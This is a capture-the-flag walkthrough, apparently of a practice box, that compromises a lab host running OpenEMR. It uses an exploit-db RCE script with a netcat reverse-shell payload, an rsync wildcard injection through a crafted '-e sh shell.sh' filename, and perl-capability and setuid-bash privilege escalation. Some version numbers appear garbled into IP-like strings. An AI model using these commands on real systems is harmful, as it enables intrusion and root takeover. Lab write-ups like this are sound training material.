Everything here is plotted!
nmap -sV -sC -T5 10.10.207.74
Nmap shows us 5 open ports. It is necessary for each of them to enumerate them. We’ll start with the FTP service.
Access to the FTP service is done with the anonymous account.
You have to look and see .- then … and finally download the file you_are_determined.txt with the command :
Reading the file you_are_determined.txt :
We get a clue. There is a service that works with the account admin. Remains to know which one?
Nmap already gave us the version. We will try to connect to the service with the admin account.
mysql -u admin -h 10.10.207.74 -P 5900
Access is possible without a password. On the other hand, there is nothing interesting inside the bases.
dirsearch -u 10.10.207.74 -x 403
We land on a page with a base64 encoded string, apparently.
Same thing in his directory
The two elements are only rabbitholes
dGhpcyBtaWdodCBiZSBhIHVzZXJuYW1l === this might be a username
aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ== === https://www.youtube.com/watch?v=dQw4w9WgXcQ
dirsearch -u 10.10.207.74 :8890-x 403
We get several interesting directories.
We land on a login page
By performing a search on Google, it appears that versions 220.127.116.11, 18.104.22.168 are vulnerable. You have to be authenticated. We must therefore find a way to log in to the interface.
First, we will parse the website again only on /portal this time.
dirsearch -u 10.10.207.74 :8890/portal -x 403
There is a setup.php page which apparently allows us to set up a new site. After some google research, there is also another page admin.php which gives us other information.
This is not a very simple feat to set up. You have to think about and remember the accesses that you have found before. It took me a long time to understand…
You have to put a name to the site and continue
Take the choice: Have setup create the database
And finally we arrive at the configuration page of the new site.
Les informations à modifier :
server host : 10.10.207.74
Server Port: 5900
Login Name: newuser
Password: whatever you want
Name for Root Account: admin ( this is the account with which we connected to the sql database )
Initial User: newsadmin
Initial User Password: whatever you want
Be careful, after clicking on continue, it can take up to 1 minute to get to the next step.
Now that we have identifiers to connect to the OpenEmr application. It is possible to use the available exploits that allow you to obtain an RCE.
Exploit to use : https://www.exploit-db.com/exploits/45161
Line 66 needs to be changed. You have to put the name of the new site.
Command to launch the exploit :
python2.7 45161.py -u admin -p password -c ‘rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f’ http://10.10.137.4:8890/portal/
Linpeas shows us a scheduled task that runs every minute.
There is a wildcard in the command line. This can be used to elevate privileges. As the script will save all the elements ( * ) present in config. We will create a file in this folder which will force rsync to execute the command that we insert.
echo “cp /bin/bash /home/plot_admin/ shell; chmod +s /home/plot_admin/shell” > shell.sh
touch — “-e sh shell.sh”
Once the scheduled task has been executed, you must go to the /home/plot_admin folder and execute the new bash.
Linpeas had already shown it. Perl has capabilities. The website gtfobins explains how to elevate privileges to root.
getcap -r / 2>/dev/null
Commande original de gtfobins :
./perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’
Commande modifiée :
/usr/bin/perl -e ‘chmod 7777, “/bin/bash”‘
That’s all folks
Thank you for taking the trouble to come to the site to read this Write Up
I hope he has more of you and that he taught you new things.
Feel free to leave a comment or share this article.